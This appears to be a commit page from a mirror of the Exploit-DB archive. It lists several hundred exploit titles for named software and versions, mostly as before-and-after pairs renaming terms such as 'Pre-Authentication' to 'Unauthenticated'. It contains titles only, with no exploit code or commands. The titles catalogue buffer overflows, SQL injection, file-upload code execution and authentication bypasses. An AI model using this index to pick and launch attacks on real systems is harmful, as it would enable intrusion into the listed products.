bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-09

Browse source 
11 new exploits

Samba 3.0.4 - SWAT Authorization Buffer Overflow
Samba 3.0.4 SWAT - Authorisation Buffer Overflow

Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)

HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)
HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)

WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)
WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)

FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service
FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service

Multiple Applications - Local Credentials Disclosure

Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service
Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service

IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit
IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit

Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2)
Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)

IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit
IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit

Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)
Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)

Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow
Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow
SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow
Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite
SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow
Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite

Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)
Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)

Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC)
Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)

Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow
Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow
SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution
McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)
SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution
McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)

MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow
MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow

NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit
NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit

HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow
HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow

BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow
BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow

Joomla Component JPad 1.0 - Post-Authentication SQL Injection
Joomla Component JPad 1.0 - Authenticated SQL Injection

CMS Made Simple 1.2.4 - (FileManager module) File Upload
CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload

freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication)
freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)

freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow
freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow

vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit
vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit

Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service
Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service

Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit

Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service
Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service

AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection
AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection

AvailScript Jobs Portal Script - (Post-Authentication) File Upload
AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload
Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service
Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement
Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service
Serv-U 7.3 - (Authenticated) Remote FTP File Replacement

Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC)
Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)

Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service
Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service

freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC
freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC

LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection
LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection

freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC
freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC

AJ Auction Authentication - Bypass Exploit
AJ Auction - Authentication Bypass

Simple Directory Listing 2 - Cross-Site File Upload
Simple Directory Listing 2 - Cross-Site Arbitrary File Upload

Mini File Host 1.x - Arbitrary PHP File Upload
Mini File Host 1.x - Arbitrary .PHP File Upload

Memberkit 1.0 - Remote PHP File Upload
Memberkit 1.0 - Remote Arbitrary .PHP File Upload

WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow
WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow

Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload
Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload

Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)
Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)

WikkiTikkiTavi 1.11 - Remote PHP File Upload
WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload

Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation
Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation

zFeeder 1.6 - 'admin.php' Pre-Authentication
zFeeder 1.6 - 'admin.php' Unauthenticated

Addonics NAS Adapter - Post-Authentication Denial of Service
Addonics NAS Adapter - Authenticated Denial of Service

Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service
Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service

Hannon Hill Cascade Server - (Post-Authentication) Command Execution
Hannon Hill Cascade Server - (Authenticated) Command Execution

Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities
Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities

Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities
Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities

Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution
Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution

XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC)
XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)

Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service
Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service

Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure
Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure

MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC
MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC

Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal
Adobe JRun 4 - (logfile) Authenticated Directory Traversal

FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service
FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service

NetAccess IP3 - (Post-Authentication) (ping option) Command Injection
NetAccess IP3 - (Authenticated) (ping option) Command Injection

Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute
Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution

Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service
Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service

HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow
HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow

Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow
Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow

httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC)
httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)

(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)
(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)

(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit
(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit
Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow
Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC)
Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)

httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)
httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)

Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC)
Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)

(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)
(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)
eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC)
eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)
eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)

eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)

eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)

uTorrent WebUI 0.370 - Authorization header Denial of Service
uTorrent WebUI 0.370 - Authorisation Header Denial of Service

Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow
Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow

ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass)
ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)

Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting
Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service
(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service

BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass)
BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)

dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)
dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)
Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)

UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow
UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow

Achievo 1.4.3 - Multiple Authorization Flaws
Achievo 1.4.3 - Multiple Authorisation Flaws

PHPMotion 1.62 - 'FCKeditor' File Upload
PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload

Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal
Home FTP Server 1.11.1.149 - Authenticated Directory Traversal

News Script PHP Pro - 'FCKeditor' File Upload
News Script PHP Pro - 'FCKeditor' Arbitrary File Upload

Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow
Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow

ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow
ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow

Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion
Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion

HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow
HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow

MailEnable - Authorization Header Buffer Overflow
MailEnable - Authorisation Header Buffer Overflow
ColdFusion 8.0.1 - Arbitrary File Upload and Execution
Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution
ColdFusion 8.0.1 - Arbitrary File Upload / Execution
Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution

OpenX - banner-edit.php File Upload PHP Code Execution
OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution

Joomla 1.5.12 - tinybrowser File Upload Code Execution
Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution

N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit
N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit

If-CMS 2.07 - Pre-Authentication Local File Inclusion (1)
If-CMS 2.07 - Unauthenticated Local File Inclusion (1)

IPComp - encapsulation Pre-Authentication kernel memory Corruption
IPComp - encapsulation Unauthenticated kernel memory Corruption

SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit
SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit

Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass)
Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)

Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow
Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow

ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow
ActFax Server FTP - (Authenticated) Remote Buffer Overflow

If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2)
If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)

DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)
DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)

DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit
DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit

TomatoCart 1.1 - Post-Authentication Local File Inclusion
TomatoCart 1.1 - Authenticated Local File Inclusion

BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass

QuiXplorer 2.3 - Bugtraq File Upload
QuiXplorer 2.3 - Bugtraq Arbitrary File Upload

QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit)
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)

Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution
Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution
Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit
Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)
Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit
Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)

BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR
BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass

Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection
Dolibarr ERP & CRM 3 - Authenticated OS Command Injection

V-CMS - PHP File Upload and Execution
V-CMS - Arbitrary .PHP File Upload / Execution

WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection
WebCalendar 1.2.4 - Unauthenticated Remote Code Injection

appRain CMF - Arbitrary PHP File Upload
appRain CMF - Arbitrary .PHP File Upload

EGallery - PHP File Upload
EGallery - Arbitrary .PHP File Upload

SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection
SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection

WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload
WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload

WebPageTest - Arbitrary PHP File Upload
WebPageTest - Arbitrary .PHP File Upload

XODA 0.4.5 - Arbitrary PHP File Upload
XODA 0.4.5 - Arbitrary .PHP File Upload

Elcom CMS 7.4.10 - Community Manager Insecure File Upload
Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload

Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection
Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection

Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow
Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow
Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure
OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)
OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit

qdPM 7.0 - Arbitrary PHP File Upload
qdPM 7.0 - Arbitrary .PHP File Upload

Oracle Database - Authentication Protocol Security Bypass
Oracle Database - Protocol  Authentication Bypass

Mod_NTLM 0.x - Authorization Heap Overflow
Mod_NTLM 0.x - Authorisation Heap Overflow

Mod_NTLM 0.x - Authorization Format String
Mod_NTLM 0.x - Authorisation Format String

Geeklog 1.3.x - Authentication SQL Injection
Geeklog 1.3.x - Authenticated SQL Injection

NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution
NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution

PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution
PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution

MySQL - Remote Pre-Authentication User Enumeration
MySQL - Remote Unauthenticated User Enumeration

vbPortal 2.0 alpha 8.1 - Authentication SQL Injection
vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection
DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1)
DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2)
DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3)
DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)
DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)
DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)
WordPress WP-Property Plugin - PHP File Upload
WordPress Asset-Manager Plugin - PHP File Upload
WordPress WP-Property Plugin - Arbitrary .PHP File Upload
WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload

Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution
Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution

RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service
RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2)
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)

Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution
Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution

Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun
Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun

Novell NCP - Pre-Authentication Remote Root Exploit
Novell NCP - Unauthenticated Remote Root Exploit

Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass
Polar Helpdesk 3.0 - Cookie Based Authentication Bypass

IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution
IRIS Citations Management Tool - (Authenticated) Remote Command Execution

Polycom HDX - Telnet Authorization Bypass (Metasploit)
Polycom HDX - Telnet Authentication Bypass (Metasploit)

OpenEMR - PHP File Upload
OpenEMR - Arbitrary .PHP File Upload

PolarPearCMS - PHP File Upload
PolarPearCMS - Arbitrary .PHP File Upload

Apache 2.0.x - mod_ssl Remote Denial of Service
Apache/mod_ssl 2.0.x - Remote Denial of Service

phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload
phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload

BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload
BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload

BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal
BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal

MoinMoin - twikidraw Action Traversal File Upload
MoinMoin - twikidraw Action Traversal Arbitrary File Upload

Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption
Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption

Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow
Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow

FlexWATCH 3.0 - AIndex.asp Authorization Bypass
FlexWATCH 3.0 - AIndex.asp Authentication Bypass
HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload
HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload
HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload
HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload

WordPress Curvo Themes - Cross-Site Request Forgery File Upload
WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload

WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload
WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload

PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass
PHPBB2 - Admin_Ug_Auth.php Administrative Bypass

Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass
Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass

Castripper 2.50.70 - '.pls' DEP Exploit
Castripper 2.50.70 - '.pls' DEP Bypass Exploit

Google Urchin 5.7.3 - Report.cgi Authorization Bypass
Google Urchin 5.7.3 - Report.cgi Authentication Bypass

Adobe Flash - Method Calls Use-After-Free

Adobe Flash - Transform.colorTranform Getter Info Leak

RSA Authentication Agent for Web 5.3 - URI redirection
RSA Authentication Agent for Web 5.3 - URI Redirection

Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow

Zabbix 2.0 - 3.0.3 - SQL Injection

ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution
ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution

Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure

LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure

SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload
SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload

Katello (Red Hat Satellite) - users/update_roles Missing Authorization
Katello (Red Hat Satellite) - users/update_roles Missing Authorisation

Freepbx 13.0.x < 13.0.154 - Remote Command Execution
FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution

Jobberbase 2.0 - Multiple Vulnerabilities

Windows x86 - Bind Shell TCP Shellcode

WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload
WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload
Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution

Moab < 7.2.9 - Authorization Bypass
Moab < 7.2.9 - Authentication Bypass

Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection
Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection

Drupal Core < 7.32 - Pre-Authentication SQL Injection
Drupal Core < 7.32 - Unauthenticated SQL Injection

Tincd - Post-Authentication Remote TCP Stack Buffer Overflow
Tincd - Authenticated Remote TCP Stack Buffer Overflow

PMB 4.1.3 - Post-Authentication SQL Injection
PMB 4.1.3 - Authenticated SQL Injection

Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution
Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution

ManageEngine Multiple Products - Authenticated File Upload
ManageEngine Multiple Products - Authenticated Arbitrary File Upload
Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution
X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass)
Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution
X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)

Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution
Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution

Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection
Symantec Web Gateway 5 - restore.php Authenticated Command Injection

JBoss Seam 2 - Arbitrary File Upload and Execution
JBoss Seam 2 - Arbitrary File Upload / Execution

Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)
Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)

Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution
Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution

WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution
WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution

JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass
JibberBook 2.3 - 'Login_form.php' Authentication Bypass

Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution
Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution

Zenoss 3.2.1 - Remote Post-Authentication Command Execution
